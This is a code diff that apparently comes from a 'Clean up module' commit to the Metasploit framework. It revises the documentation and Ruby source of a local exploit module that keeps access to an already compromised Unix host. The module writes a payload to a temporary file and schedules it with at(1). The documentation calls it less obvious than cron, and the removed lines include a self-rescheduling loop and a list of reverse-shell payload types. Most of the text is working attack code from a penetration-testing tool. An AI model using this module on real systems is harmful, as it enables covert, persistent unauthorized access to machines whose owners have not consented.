Clean up module

documentation/modules/exploit/unix/local/at_persistence.md

@@ -11,7 +11,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
 
   1. Start msfconsole
   2. Exploit a box via whatever method
-  3. Do: `use exploit/multi/local/at_persistence`
+  3. Do: `use exploit/unix/local/at_persistence`
   4. Do: `set session #`
   5. Do: `set target #`
   6. `exploit`
@@ -19,14 +19,14 @@ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
 
 ## Options
 
-  **TIMING**
+  **TIME**
 
-  Controls the time value passed to `at(1)`
+  When to run job via at(1).  Changing may require WfsDelay to be adjusted.
 
   **PATH**
 
-  If set, uses this value as the path on the remote system to store the payload.  If unset, uses `mktemp`.
+  Path to store payload to be executed by at(1).  Leave unset to use mktemp.
 
 ## Scenarios
 
-TBD
+This module is useful for running one-shot payloads with delayed execution.It is slightly less obvious than cron.

modules/exploits/unix/local/at_persistence.rb

@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
-  include Msf::Post::Unix
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
@@ -27,66 +26,47 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultTarget'  => 0,
         'Platform'       => %w(unix),
         'Arch'           => ARCH_CMD,
-        'Payload'        =>
-        {
-          'Compat'     =>
-          {
-            'PayloadType'  => 'cmd cmd_bash',
-            'RequiredCmd'  => 'bash-tcp gawk generic openssl perl python ruby'
-          }
-        },
-        'DefaultOptions' => { 'WfsDelay' => 65 },
         'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
       )
     )
 
     register_options(
       [
-        OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
-        OptBool.new('CLEANUP', [true, 'Delete payload after execution', true])
+        OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted.', 'now'])
       ]
     )
 
     register_advanced_options(
       [
-        OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp'])
+        OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp.'])
       ]
     )
   end
 
   def check
-    token = "fail #{Rex::Text.rand_text_alphanumeric(8)}"
-    if cmd_exec("at -l || echo #{token}") =~ /#{token}/
-      Exploit::CheckCode::Safe
-    else
+    token = Rex::Text.rand_text_alphanumeric(8)
+    if cmd_exec("atq && echo #{token}").include?(token)
       Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
     end
   end
 
-  def cmd_exec(cmd)
-    super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}")
-  end
-
   def exploit
     unless check == Exploit::CheckCode::Vulnerable
       fail_with(Failure::NoAccess, 'User denied cron via at.deny')
     end
 
-    unless (payload_file = datastore['PATH'] || cmd_exec('mktemp'))
+    unless (payload_file = (datastore['PATH'] || cmd_exec('mktemp')))
       fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
     end
 
-    persistent_payload = "at -f #{payload_file} #{datastore['TIME']}\n" + payload.encoded
-    write_file(payload_file, persistent_payload)
-    register_files_for_cleanup(payload_file) if datastore['CLEANUP']
+    write_file(payload_file, payload.encoded)
+    register_files_for_cleanup(payload_file)
 
     cmd_exec("chmod 700 #{payload_file}")
     cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
 
-    print_status("Waiting  up to #{datastore['WfsDelay']}sec for execution")
-    0.upto(datastore['WfsDelay'].to_i) do
-      Rex.sleep(1)
-      break if session_created?
-    end
+    print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")
   end
 end